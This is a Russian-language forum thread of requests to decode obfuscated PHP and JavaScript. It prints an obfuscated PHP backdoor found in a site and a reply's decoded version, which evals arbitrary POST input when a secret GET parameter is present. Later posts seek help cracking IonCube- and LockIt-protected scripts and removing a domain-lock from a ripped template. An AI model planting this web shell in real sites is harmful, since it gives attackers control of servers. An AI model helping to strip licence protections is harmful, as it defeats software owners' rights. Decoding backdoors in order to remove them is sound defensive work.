А топик еще актуальный ?? Если да, то помогите декодить http://pastebin.com/1H5eHfeW http://pastebin.com/WEQhsmRb Спасибо.
<?php if(isset($_GET[w7926t])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d); } Что это и как с ним бороться? Если удалить это из кода вместо сайта будет просто белый экран.
Это PHP: <?php if(isset($_GET[w7926t])) { $p=@$_POST['p1']; $m=sprintf("%c",92); if(strpos($p,"$m$m")) { $p=stripslashes($p); } ob_start(); eval($p); $temp="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo(strlen($temp)."\n".$temp); exit; } Но подозреваю, что это тоже Вам ничего не скажет
доп код ясен. а вот первая часть, скорее всего, при проверке куки с третьего раза открывает другой сайт. или я ошибаюсь?
Всем привет, помогите, пожалуйста расколдовать данный код - http://pastebin.com/v4LNuYWx (IonCube) С меня бонусы
http://pastebin.com/RKekqjxq Для расшифровки нужен ключ, который передается параметром key через _GET, _POST, или _COOKIE
Не могли бы Вы помочь раскодировать парочку файлов? http://pastebin.com/rQVvGxQB http://pastebin.com/JmDsGude Целый день промучался, так ни чего и не получилось. Заранее спасибо.
Декодер снимает последний php lockit (без вирусов и глюков типа universal decoder). Требования: только php5 Пример обфусцированного кода: PHP: <?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. $OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=524;eval((base64_decode('JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0tJE8wME8wME8wMClmZ2V0cygkTzAwME8wTzAwLDEwMjQpO2ZnZXRzKCRPMDAwTzBPMDAsNDA5Nik7JE9PMDBPMDBPMD0oYmFzZTY0X2RlY29kZShzdHJ0cihmcmVhZCgkTzAwME8wTzAwLDM3MiksJ0VudGVyeW91d2toUkhZS05XT1VUQWFCYkNjRGRGZkdnSWlKakxsTW1QcFFxU3NWdlh4WnowMTIzNDU2Nzg5Ky89JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?> kr9NHenNHenNHe1lFMamb3klFoxiC2APk19gOLlHOa9gkZXJkZwVkr9NTznNHr8XHt4JkZwShokiF2A2Yy9LcBYvcoAPF3OZfuwPcmklCBWPkr8XHenNHr8XHtXLT08XHr8XHeEXhUXmOB50cbk5d3a3D2iUUylRTlfNaaOnCAkJW2YrcrcMO2fkDApQToxYdanXAbyTF1c2BuiDGjExHjH0YTC3KeLqRz0mRtfnWLYrOAcuUrlhU0xYTL9WAakTayaBa1icBMyJC2OlcMfPDBpqdo1Vd3nxFmY0fbc3Gul6HerZHzW1YjF4KUSvkZLphUL7cMYSd3YlhtONHeEXTznNHeEpK2a2CBXPkr9NHenNHenNHtL7eWpZcby1Dbklb29VC2APwMilCBOlFJ5XDuEJhTSIeWPjDBCPky9WT1YABZfXFM94k10INT0IkZFpwoOpcUImzGAI8+qI5+es+Zev8K7Q8GIikZL7eWPYtJHLCbwINUnlGunSd2OlhtkFdJwSwtOgAr9TaySmFukvGtffhTSYtJYlC2ivwtw8Cj7r7VuI4Vvl7G4IwJ5jd3aVftILCbwpRJwI7/eV6vuPKjXvCj48Cmw+NokZNJw7eWPjcM9ZcByjDtILCbwICbHIkorpeWPjGX0htUOMwe0IcM9XcB4Pk3nZd3i5RmO4ftFSwtf3kZL7eWPkcmfZDbOlhtOMRtn0FMlshtOgAr9TaySmFukvGtffhU4JbukFdJwpKX0htBcjdo9zcUILcJL7eWPkw2ajDo8IfukpdUILCULVkzxJFj4mKX0hw30YtMilCBOlFJIJTo9jCbOpd246DB5LcbIVFoiXwJL7eWPIFMaxfBlZca9vdMYlhtkMd290cbwVFoiXwJL7wE0heWP= http://yadi.sk/d/7S0wixyj3-A19
Помогите расшифровать скрип за вознаграждение, скрипт накрыт IonCube Loader 4, и еще чем то сверху. http://zalil.ru/34312979 Кто сможет пишите в личку или сюда. Бюджет договорной, если этот раскодируете то скину еще 3 файла закодированного, плиз очень нужно.
Прошу помочь. Расшифровка JS Друзья! Прошу вашей помощи в расшифровании JS скрипта. Только учусь ремеслу, отнеситесь с пониманием. Вообщем рипнутый шаб - защита с привязкой к домену в JS. Вот код (привел в божеский вид): _www.maxpages.ru/jscode.txt Подозреваю, что хитрость тут: HTML: , a.jQuery = a.$ = p, typeof define == "function" && define.amd && define.amd.jQuery && define("jquery", [], function() { return p }) })(window); []['\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72']['\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72'](self['\x75\x6e\x65\x73\x63\x61\x70\x65']('%69%66%28%7e%6c%6f%63%61%74%69%6f%6e%2e%70%72%6f%74%6f%63%6f%6c%2e%69%6e%64%65%78%4f%66%28%27%68%74%74%70%3a%27%29%26%26%7e%6c%6f%63%61%74%69%6f%6e%2e%68%6f%73%74%2e%69%6e%64%65%78%4f%66%28%27%74%65%6d%70%6c%61%74%65%2d%68%65%6c%70%2e%63%6f%6d%27%29%29%7b%7d%65%6c%73%65%28%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%68%74%74%70%3a%2f%2f%74%65%6d%70%6c%61%74%65%6d%6f%6e%73%74%65%72%2e%63%6f%6d%27%29'))() - как его разгадать? Выкладываю оригинал на всякий случай _www.maxpages.ru/jquery.min.js Спасибо большое.
